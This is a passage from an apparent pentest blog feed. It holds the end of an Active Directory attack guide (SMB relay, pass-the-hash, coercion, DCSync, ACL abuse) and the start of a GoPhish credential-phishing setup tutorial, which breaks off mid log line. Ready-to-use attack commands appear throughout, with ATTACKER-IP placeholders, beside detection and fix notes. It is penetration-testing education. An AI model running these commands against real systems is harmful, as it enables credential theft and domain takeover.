B.</p><p><strong>How common:</strong> Still present in ~60–70% of enterprise environments. Windows Server 2025 made SMB signing default, but Server 2016&#x2F;2019 (the majority of production) still requires manual config.</p><p><strong>Check SMB signing:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># NetExec - scan the whole subnet</span></span><br><span class="line">nxc smb &lt;SUBNET&gt;/24 --gen-relay-list relay_targets.txt</span><br><span class="line"></span><br><span class="line"><span class="comment"># Manually check</span></span><br><span class="line">nxc smb &lt;TARGET-IP&gt; -u <span class="string">&#x27;&#x27;</span> -p <span class="string">&#x27;&#x27;</span></span><br><span class="line"><span class="comment"># Look for: signing:False</span></span><br></pre></td></tr></table></figure></div><p><strong>Relay attack:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Terminal 1: Responder (SMB/HTTP off, just poison)</span></span><br><span class="line"><span class="built_in">sudo</span> responder -I eth0 -wd</span><br><span class="line"></span><br><span class="line"><span class="comment"># Terminal 2: ntlmrelayx</span></span><br><span class="line">impacket-ntlmrelayx -tf relay_targets.txt -smb2support</span><br><span class="line"></span><br><span class="line"><span class="comment"># For interactive shell:</span></span><br><span class="line">impacket-ntlmrelayx -tf relay_targets.txt -smb2support -i</span><br><span class="line"></span><br><span class="line"><span class="comment"># Relay and dump SAM:</span></span><br><span class="line">impacket-ntlmrelayx -tf relay_targets.txt -smb2support --sam</span><br></pre></td></tr></table></figure></div><p><strong>Coerce authentication (no waiting):</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Force any machine to auth to you</span></span><br><span class="line">impacket-PetitPotam &lt;ATTACKER-IP&gt; &lt;TARGET-IP&gt;</span><br><span class="line">.\SpoolSample.exe &lt;TARGET-IP&gt; &lt;ATTACKER-IP&gt;</span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Event ID <code>4624</code> (Type 3 logon) from unexpected source, <code>4625</code> failures during relay attempts.</p><p><strong>Fix:</strong> Enforce SMB signing via GPO: <code>Computer Configuration → Policies → Windows Settings → Security Settings → Local Policies → Security Options → Microsoft network client: Digitally sign communications (always): Enabled</code></p><hr><h2 id="13-Pass-the-Hash-PTH"><a href="#13-Pass-the-Hash-PTH" class="headerlink" title="13. Pass-the-Hash (PTH)"></a>13. Pass-the-Hash (PTH)</h2><p><strong>What it is:</strong> Use a captured NTLM hash directly for authentication - no need to crack it. Works with local admin hashes, domain user hashes, machine account hashes.</p><p><strong>How common:</strong> If you can dump any hash (LSASS, SAM, NTDS), PTH is your immediate next move. Standard in every engagement.</p><p><strong>Dump hashes first:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># LSASS dump (requires local admin)</span></span><br><span class="line">.\Mimikatz.exe <span class="string">&quot;privilege::debug&quot;</span> <span class="string">&quot;sekurlsa::logonpasswords&quot;</span> <span class="built_in">exit</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># SAM dump via registry</span></span><br><span class="line">impacket-secretsdump -sam SAM -system SYSTEM LOCAL</span><br><span class="line"></span><br><span class="line"><span class="comment"># Remote SAM dump</span></span><br><span class="line">impacket-secretsdump domain/user:password@&lt;TARGET-IP&gt;</span><br></pre></td></tr></table></figure></div><p><strong>Use the hash:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># NetExec</span></span><br><span class="line">nxc smb &lt;TARGET-IP&gt; -u Administrator -H &lt;NTLM_HASH&gt;</span><br><span class="line">nxc smb &lt;SUBNET&gt;/24 -u Administrator -H &lt;NTLM_HASH&gt; --local-auth  <span class="comment"># spray</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># Impacket suite</span></span><br><span class="line">impacket-psexec domain/user@&lt;TARGET-IP&gt; -hashes :NTLM_HASH</span><br><span class="line">impacket-wmiexec domain/user@&lt;TARGET-IP&gt; -hashes :NTLM_HASH</span><br><span class="line">impacket-smbexec domain/user@&lt;TARGET-IP&gt; -hashes :NTLM_HASH</span><br><span class="line"></span><br><span class="line"><span class="comment"># Evil-WinRM (for WinRM targets)</span></span><br><span class="line">evil-winrm -i &lt;TARGET-IP&gt; -u Administrator -H &lt;NTLM_HASH&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># RDP with restricted admin mode</span></span><br><span class="line">xfreerdp /u:Administrator /pth:&lt;NTLM_HASH&gt; /v:&lt;TARGET-IP&gt;</span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Event ID <code>4624</code> logon type 3 (network logon) with <code>NTLM</code> authentication from unexpected sources. NTLMv1 usage is a red flag.</p><p><strong>Fix:</strong> Enable Windows Defender Credential Guard, Protected Users group, disable NTLMv1, enable SMB signing. Long term: move to Kerberos-only auth where possible.</p><hr><h2 id="14-GenericAll-WriteDACL-over-Domain-Object"><a href="#14-GenericAll-WriteDACL-over-Domain-Object" class="headerlink" title="14. GenericAll &#x2F; WriteDACL over Domain Object"></a>14. GenericAll &#x2F; WriteDACL over Domain Object</h2><p><strong>What it is:</strong> Some accounts get <code>WriteDACL</code> or <code>GenericAll</code> over the entire domain object - usually from Exchange setup, AD migration tools, or misconfigured OUs. This means you can grant yourself any right, including DCSync.</p><p><strong>How common:</strong> Exchange installs historically granted broad AD rights. Environments that ran Exchange 2010&#x2F;2013 almost certainly have this. Also shows up after AD migration projects.</p><p><strong>Find it:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># PowerView</span></span><br><span class="line">Get-ObjectAcl -DistinguishedName <span class="string">&quot;DC=domain,DC=local&quot;</span> -ResolveGUIDs | </span><br><span class="line">  Where-Object &#123;<span class="variable">$_</span>.ActiveDirectoryRights -match <span class="string">&quot;WriteDacl|GenericAll&quot;</span>&#125; |</span><br><span class="line">  Select IdentityReference, ActiveDirectoryRights</span><br><span class="line"></span><br><span class="line"><span class="comment"># BloodHound - look for WriteDACL edges to the domain node</span></span><br></pre></td></tr></table></figure></div><p><strong>Exploit — grant yourself DCSync:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># PowerView</span></span><br><span class="line">Add-DomainObjectAcl -TargetIdentity <span class="string">&quot;DC=domain,DC=local&quot;</span> \</span><br><span class="line">  -PrincipalIdentity youruser \</span><br><span class="line">  -Rights DCSync -Verbose</span><br><span class="line"></span><br><span class="line"><span class="comment"># Then DCSync</span></span><br><span class="line">impacket-secretsdump domain/youruser:password@&lt;DC-IP&gt;</span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Event ID <code>5136</code> - attribute modification on the domain object. <code>4662</code> with replication rights.</p><p><strong>Fix:</strong> Audit and remove Exchange&#x2F;migration tool permissions post-deployment. Microsoft has specific guidance for removing Exchange’s over-privileged AD ACLs.</p><hr><h2 id="15-Print-Spooler-WebDAV-Coercion-Authentication-Forcing"><a href="#15-Print-Spooler-WebDAV-Coercion-Authentication-Forcing" class="headerlink" title="15. Print Spooler &#x2F; WebDAV Coercion (Authentication Forcing)"></a>15. Print Spooler &#x2F; WebDAV Coercion (Authentication Forcing)</h2><p><strong>What it is:</strong> Force any Windows machine (including DCs) to authenticate back to you using protocol-level coercion bugs. Combine with relay attacks or unconstrained delegation to collect TGTs.</p><p><strong>How common:</strong> Print Spooler is still enabled on DCs in many environments. WebDAV is common on workstations. These are force multipliers for relay attacks.</p><p><strong>Check if Print Spooler is running:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Check remotely</span></span><br><span class="line">nxc smb &lt;DC-IP&gt; -u user -p password -M spooler</span><br><span class="line"></span><br><span class="line"><span class="comment"># Or manually</span></span><br><span class="line">sc \\&lt;DC-IP&gt; query spooler</span><br></pre></td></tr></table></figure></div><p><strong>Coerce authentication:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># PrinterBug / SpoolSample</span></span><br><span class="line">.\SpoolSample.exe &lt;TARGET-IP&gt; &lt;ATTACKER-IP&gt;</span><br><span class="line">python printerbug.py domain/user:password@&lt;TARGET-IP&gt; &lt;ATTACKER-IP&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># PetitPotam (no auth needed in unpatched versions)</span></span><br><span class="line">python PetitPotam.py &lt;ATTACKER-IP&gt; &lt;TARGET-IP&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># Coercer (all-in-one coercion tool)</span></span><br><span class="line">coercer coerce -u user -p password -d domain.local \</span><br><span class="line">  --listener-ip &lt;ATTACKER-IP&gt; --target-ip &lt;TARGET-IP&gt;</span><br></pre></td></tr></table></figure></div><p><strong>Chain with relay or unconstrained delegation:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Coerce DC → relay to ADCS (ESC8)</span></span><br><span class="line">certipy relay -ca &lt;CA-IP&gt; -template DomainController</span><br><span class="line">python PetitPotam.py &lt;ATTACKER-IP&gt; &lt;DC-IP&gt;</span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Unusual outbound connections from DCs to workstations&#x2F;attacker IPs, Event ID <code>4648</code> (explicit credential logon), <code>3</code> in RPC logs.</p><p><strong>Fix:</strong> Disable Print Spooler on all DCs (<code>Stop-Service spooler; Set-Service spooler -StartupType Disabled</code>). Install MS-EFSRPC patch (KB5005413). Disable WebDAV where not needed.</p><hr><h2 id="16-LDAP-Null-Anonymous-Bind"><a href="#16-LDAP-Null-Anonymous-Bind" class="headerlink" title="16. LDAP Null &#x2F; Anonymous Bind"></a>16. LDAP Null &#x2F; Anonymous Bind</h2><p><strong>What it is:</strong> Some DCs are still configured to allow unauthenticated LDAP queries - meaning you can enumerate users, groups, OUs, and policies without any credentials.</p><p><strong>How common:</strong> Less common in modern setups but still present in orgs that haven’t hardened their DC configs. I find it in ~20% of BFSI engagements.</p><p><strong>Test it:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Test null bind</span></span><br><span class="line">ldapsearch -x -h &lt;DC-IP&gt; -b <span class="string">&quot;DC=domain,DC=local&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># NetExec</span></span><br><span class="line">nxc ldap &lt;DC-IP&gt; -u <span class="string">&#x27;&#x27;</span> -p <span class="string">&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># enum4linux-ng</span></span><br><span class="line">enum4linux-ng -A &lt;DC-IP&gt;</span><br><span class="line"></span><br><span class="line"><span class="comment"># ldapdomaindump with null creds</span></span><br><span class="line">ldapdomaindump -u <span class="string">&#x27;&#x27;</span> -p <span class="string">&#x27;&#x27;</span> &lt;DC-IP&gt;</span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Event ID <code>2889</code> on DCs (unsigned LDAP bind). Enable LDAP diagnostic logging.</p><p><strong>Fix:</strong> Set <code>LDAPServerIntegrity = 2</code> (Require Signing) via GPO. Disable anonymous LDAP access. Require LDAP channel binding (KB4520412).</p><hr><p><strong>Common ACL exploits:</strong></p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># GenericAll over a user → force password reset</span></span><br><span class="line">net user targetuser NewPassword123! /domain</span><br><span class="line"></span><br><span class="line"><span class="comment"># GenericAll over a group → add yourself</span></span><br><span class="line">net group <span class="string">&quot;Domain Admins&quot;</span> currentuser /add /domain</span><br><span class="line"></span><br><span class="line"><span class="comment"># GenericWrite over a user → set SPN and Kerberoast</span></span><br><span class="line">Set-DomainObject -Identity targetuser -Set @&#123;serviceprincipalname=<span class="string">&#x27;fake/spn&#x27;</span>&#125;</span><br><span class="line">.\Rubeus.exe kerberoast /user:targetuser /outfile:hash.txt</span><br><span class="line"></span><br><span class="line"><span class="comment"># WriteDACL → grant yourself DCSync</span></span><br><span class="line">Add-DomainObjectAcl -TargetIdentity <span class="string">&quot;DC=domain,DC=local&quot;</span> \</span><br><span class="line">  -PrincipalIdentity currentuser \</span><br><span class="line">  -Rights DCSync</span><br></pre></td></tr></table></figure></div><p><strong>Detection:</strong> Event IDs <code>5136</code> (DS object modified), <code>4728</code> (group membership change). Any modification to DA group should page someone immediately.</p><p><strong>Fix:</strong> Audit ACLs with BloodHound regularly. Implement least-privilege AD tiering model. Enable audit on critical group changes.</p><hr><h2 id="Quick-Reference-Toolkit"><a href="#Quick-Reference-Toolkit" class="headerlink" title="Quick Reference Toolkit"></a>Quick Reference Toolkit</h2><table><thead><tr><th>Tool</th><th>Use Case</th></tr></thead><tbody><tr><td>BloodHound + SharpHound&#x2F;bloodhound-python</td><td>Attack path mapping</td></tr><tr><td>Certipy</td><td>ADCS enumeration &amp; exploitation</td></tr><tr><td>Rubeus</td><td>Kerberos attacks (roasting, tickets, delegation)</td></tr><tr><td>NetExec (nxc)</td><td>Swiss-army knife for SMB&#x2F;LDAP&#x2F;Kerberos</td></tr><tr><td>Impacket suite</td><td>Remote execution, secretsdump, relay attacks</td></tr><tr><td>Responder</td><td>LLMNR&#x2F;NBT-NS poisoning &amp; hash capture</td></tr><tr><td>PowerView</td><td>AD enumeration from Windows</td></tr><tr><td>Snaffler</td><td>Credential hunting in shares</td></tr><tr><td>Kerbrute</td><td>User enumeration &amp; password spraying</td></tr><tr><td>PingCastle</td><td>Quick AD health scoring</td></tr></tbody></table><hr><hr><h2 id="Closing-Thoughts"><a href="#Closing-Thoughts" class="headerlink" title="Closing Thoughts"></a>Closing Thoughts</h2><ul><li><p>The scary thing about AD misconfigurations is that they are not vulnerabilities in the traditional sense - they are legitimate features that were configured insecurely over time. Many enterprise domains have been running for 10+ years without a proper security review, allowing SPNs, delegations, ACLs, and certificate templates to accumulate unnoticed.</p></li><li><p>In many cases, you do not need a single CVE to compromise the environment. Patience, proper enumeration, and understanding how Active Directory works are often enough.</p></li><li><p>Run these checks during every internal engagement. You will rarely leave empty-handed.</p></li><li><p>The tools mentioned above are commonly detected by AV&#x2F;EDR solutions and are referenced here strictly from an Active Directory penetration testing perspective, not for red teaming or evasion-focused operations.</p></li></ul><hr>]]></content>
    
    
      
      
    <summary type="html">&lt;link rel=&quot;stylesheet&quot; class=&quot;aplayer-secondary-style-marker&quot; href=&quot;/assets/css/APlayer.min.css&quot;&gt;&lt;script src=&quot;/assets/js/APlayer.min.js&quot; cla</summary>
      
    
    
    
    <category term="Real-World Pentest" scheme="http://example.com/categories/Real-World-Pentest/"/>
    
    
    <category term="Security" scheme="http://example.com/tags/Security/"/>
    
    <category term="Active Directory" scheme="http://example.com/tags/Active-Directory/"/>
    
    <category term="Red Team" scheme="http://example.com/tags/Red-Team/"/>
    
    <category term="Exploitation" scheme="http://example.com/tags/Exploitation/"/>
    
  </entry>
  
  <entry>
    <title>Gophish - Setting up without Evilginx - Part 2</title>
    <link href="http://example.com/2025/12/25/GoPhish-Setting-up-without-Evilgnix-Part-2/"/>
    <id>http://example.com/2025/12/25/GoPhish-Setting-up-without-Evilgnix-Part-2/</id>
    <published>2025-12-25T05:43:00.000Z</published>
    <updated>2026-06-06T09:05:49.871Z</updated>
    
    <content type="html"><![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="/assets/css/APlayer.min.css"><script src="/assets/js/APlayer.min.js" class="aplayer-secondary-script-marker"></script><h2 id="GoPhish-End-to-End-Setup-for-Credential-Capture"><a href="#GoPhish-End-to-End-Setup-for-Credential-Capture" class="headerlink" title="GoPhish End-to-End Setup for Credential Capture"></a>GoPhish End-to-End Setup for Credential Capture</h2><p>In this second part, I will be configuring <strong>GoPhish from start to end</strong>, up to the point where we successfully capture the credentials of a phished user. This setup reflects a <strong>real-world phishing simulation</strong> commonly performed during red team and VAPT engagements, without using Evilginx.</p><h3 id="Main-Components-Inside-GoPhish"><a href="#Main-Components-Inside-GoPhish" class="headerlink" title="Main Components Inside GoPhish"></a>Main Components Inside GoPhish</h3><ul><li><strong>Dashboard</strong> – Used to visualize campaign results and status using graphs</li><li><strong>Campaigns</strong> – Place where phishing campaigns are created and stopped</li><li><strong>Users and Groups</strong> – Place where victim email addresses are added</li><li><strong>Email Templates</strong> – Used to create email templates sent to victims</li><li><strong>Landing Page</strong> – Used to create pages where victims enter credentials</li><li><strong>Sending Profile</strong> – Used to configure SMTP settings</li><li><strong>User Management</strong> – Used for account configuration</li></ul><h3 id="Initial-Setup"><a href="#Initial-Setup" class="headerlink" title="Initial Setup"></a>Initial Setup</h3><p>First, create a directory to download GoPhish and perform all configurations inside it.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">❯ <span class="built_in">mkdir</span> gophish</span><br><span class="line">❯ <span class="built_in">cd</span> gophish</span><br><span class="line">❯ wget https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip -q</span><br><span class="line">❯ unzip gophish-v0.12.1-linux-64bit.zip</span><br><span class="line">❯ <span class="built_in">chmod</span> +x gophish</span><br></pre></td></tr></table></figure></div><h3 id="Domain-Mapping-A-Records"><a href="#Domain-Mapping-A-Records" class="headerlink" title="Domain Mapping (A Records)"></a>Domain Mapping (A Records)</h3><p>This step verifies that the phishing domain correctly resolves to the EC2 public IP address. Proper A-record mapping is mandatory for HTTPS certificate issuance and successful access to the phishing landing page.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">❯ dig domain.com</span><br><span class="line"></span><br><span class="line">; &lt;&lt;&gt;&gt; DiG 9.18.39-0ubuntu0.24.04.2-Ubuntu &lt;&lt;&gt;&gt; domain.com</span><br><span class="line">;; global options: +cmd</span><br><span class="line">;; Got answer:</span><br><span class="line">;; -&gt;&gt;HEADER&lt;&lt;- <span class="string">opcode: QUERY, status: NOERROR, id: 39837</span></span><br><span class="line"><span class="string">;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">;; OPT PSEUDOSECTION:</span></span><br><span class="line"><span class="string">; EDNS: version: 0, flags:; udp: 65494</span></span><br><span class="line"><span class="string">;; QUESTION SECTION:</span></span><br><span class="line"><span class="string">;domain.com.                        IN      A</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">;; ANSWER SECTION:</span></span><br><span class="line"><span class="string">domain.com.         60      IN      A       43.*.*.*</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">;; Query time: 7 msec</span></span><br><span class="line"><span class="string">;; SERVER: 127.0.0.53#53(127.0.0.53) (UDP)</span></span><br><span class="line"><span class="string">;; WHEN: Wed Oct 29 10:50:25 UTC 2025</span></span><br><span class="line"><span class="string">;; MSG SIZE  rcvd: 59</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">~</span></span><br><span class="line"><span class="string">❯</span></span><br></pre></td></tr></table></figure></div><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Phishing/gp2/img1.png"                                     ></p><h3 id="SSL-TLS-Certificate-Generation"><a href="#SSL-TLS-Certificate-Generation" class="headerlink" title="SSL&#x2F;TLS Certificate Generation"></a>SSL&#x2F;TLS Certificate Generation</h3><p>To enable HTTPS and avoid browser security warnings, we need to request SSL&#x2F;TLS certificates from <strong>Let’s Encrypt</strong> using <strong>Certbot</strong>.<br>Two certificates are required:</p><ul><li>One for the <strong>phishing domain</strong></li><li>One for the <strong>GoPhish admin dashboard</strong></li></ul><p>Run the following commands to generate the certificates:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">❯ <span class="built_in">sudo</span> certbot certonly --standalone -d domain.com</span><br><span class="line">❯ <span class="built_in">sudo</span> certbot certonly --standalone -d admin.domain.com</span><br></pre></td></tr></table></figure></div><p>After successful issuance, the certificates will be stored at the following locations:</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">/etc/letsencrypt/live/domain.com/fullchain.pem</span><br><span class="line">/etc/letsencrypt/live/domain.com/privkey.pem</span><br><span class="line">/etc/letsencrypt/live/admin.domain.com/fullchain.pem</span><br><span class="line">/etc/letsencrypt/live/admin.domain.com/privkey.pem</span><br></pre></td></tr></table></figure></div><p>Next, update the GoPhish configuration file to use these certificates for both the phishing server and the admin server.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">❯ nano gophish/config.json</span><br><span class="line">❯ <span class="built_in">cat</span> gophish/config.json</span><br><span class="line">&#123;</span><br><span class="line">        <span class="string">&quot;admin_server&quot;</span>: &#123;</span><br><span class="line">                <span class="string">&quot;listen_url&quot;</span>: <span class="string">&quot;0.0.0.0:4444&quot;</span>,</span><br><span class="line">                <span class="string">&quot;use_tls&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">                <span class="string">&quot;cert_path&quot;</span>: <span class="string">&quot;/etc/letsencrypt/live/admin.domain.com/fullchain.pem&quot;</span>,</span><br><span class="line">                <span class="string">&quot;key_path&quot;</span>: <span class="string">&quot;/etc/letsencrypt/live/admin.domain.com/privkey.pem&quot;</span>,</span><br><span class="line">                <span class="string">&quot;trusted_origins&quot;</span>: []</span><br><span class="line">        &#125;,</span><br><span class="line">        <span class="string">&quot;phish_server&quot;</span>: &#123;</span><br><span class="line">                <span class="string">&quot;listen_url&quot;</span>: <span class="string">&quot;0.0.0.0:443&quot;</span>,</span><br><span class="line">                <span class="string">&quot;use_tls&quot;</span>: <span class="literal">true</span>,</span><br><span class="line">                <span class="string">&quot;cert_path&quot;</span>: <span class="string">&quot;/etc/letsencrypt/live/domain.com/fullchain.pem&quot;</span>,</span><br><span class="line">                <span class="string">&quot;key_path&quot;</span>: <span class="string">&quot;/etc/letsencrypt/live/domain.com/privkey.pem&quot;</span></span><br><span class="line">        &#125;,</span><br><span class="line">        <span class="string">&quot;db_name&quot;</span>: <span class="string">&quot;sqlite3&quot;</span>,</span><br><span class="line">        <span class="string">&quot;db_path&quot;</span>: <span class="string">&quot;gophish.db&quot;</span>,</span><br><span class="line">        <span class="string">&quot;migrations_prefix&quot;</span>: <span class="string">&quot;db/db_&quot;</span>,</span><br><span class="line">        <span class="string">&quot;contact_address&quot;</span>: <span class="string">&quot;&quot;</span>,</span><br><span class="line">        <span class="string">&quot;logging&quot;</span>: &#123;</span><br><span class="line">                <span class="string">&quot;filename&quot;</span>: <span class="string">&quot;&quot;</span>,</span><br><span class="line">                <span class="string">&quot;level&quot;</span>: <span class="string">&quot;&quot;</span></span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line">❯</span><br></pre></td></tr></table></figure></div><blockquote><ul><li>Ensure ports 80 and 443 are accessible during certificate issuance. If port 80 is blocked, Certbot will fail to complete the HTTP-01 challenge.</li><li>The admin server port (4444) can be set to any custom port as per your requirement. In this setup, it is configured to use 4444.</li></ul></blockquote><h3 id="Running-GoPhish-Using-tmux"><a href="#Running-GoPhish-Using-tmux" class="headerlink" title="Running GoPhish Using tmux"></a>Running GoPhish Using tmux</h3><p>To keep GoPhish running continuously without interruption, we use <strong>tmux</strong> and start the GoPhish service inside a tmux session.</p><div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">❯ tmux new -s gophish</span><br><span class="line">❯ <span class="built_in">sudo</span> ./gophish</span><br><span class="line"><span class="keyword">time</span>=<span class="string">&quot;2025-10-28T18:00:46Z&quot;</span> level=warning msg=<span class="string">&quot;No contact address has been configured.&quot;</span></span><br><span class="line"><span class="keyword">time</span>=<span class="string">&quot;2025-10-28T18:00:46Z&quot;</span> level=warning msg=<span class="string">&quot;Please consider adding a contact_address entry in your config.json&quot;</span></span><br><span class="line">goose: no migrations to run. current version: 20220321133237</span><br><span class="line"><span class="keyword">time</span>=<span class="string">&quot;2025-10-28T18:00:46Z&quot;</span> level=info msg=<span class="string">&quot;Please login with the username admin and the password e8ca8cd21233a6681&quot;</span></span><br><span class="line"><span class="keyword">time</span>=<span class="string">&quot;2025-10-28T18:00:46Z&quot;</span> level=info msg=<span class="string">&quot;Starting phishing server at https://0.0.0.0:443&quot;</span></span><br><span class="line"><span class="keyword">time</span>=<span class="string">&quot;2025-10-28T18:00:46Z&quot;</span> level=info msg=<span class="string">&quot;Starting IMAP monitor manager&quot;</span></span><br><span class="line"><span class="keyword">time</span>=<span class="string">&quot;2025-10-28T18:00:46Z&quot;</span> level=info msg=<span class="string">&quot;Creating new self-signed certificates for administration interface&quot;</span></span><br><span class="line"><span class="keyword">time</span>=<span class="string">&quot;2025-10-28T18:00:46Z&quot;</span> level=info msg=<span class="string">&quot;Starting new IMAP monitor for user admin&quot;</span></span><br><span class="line"><span class="keyword">time</span>=<span class="string">&quot;2025-10-28T18:00:46Z&quot;</span> level=info msg=<span class="string">&quot;Background Worker Started Successfully - Waiting for Campaigns&quot;</span></span><br><span class="line"><span class="keyword">time</span>=<span class="string">&quot;2025-10-28T18:00:46Z&quot;</span> level=info msg=<span class="string">&quot;TLS Certificate 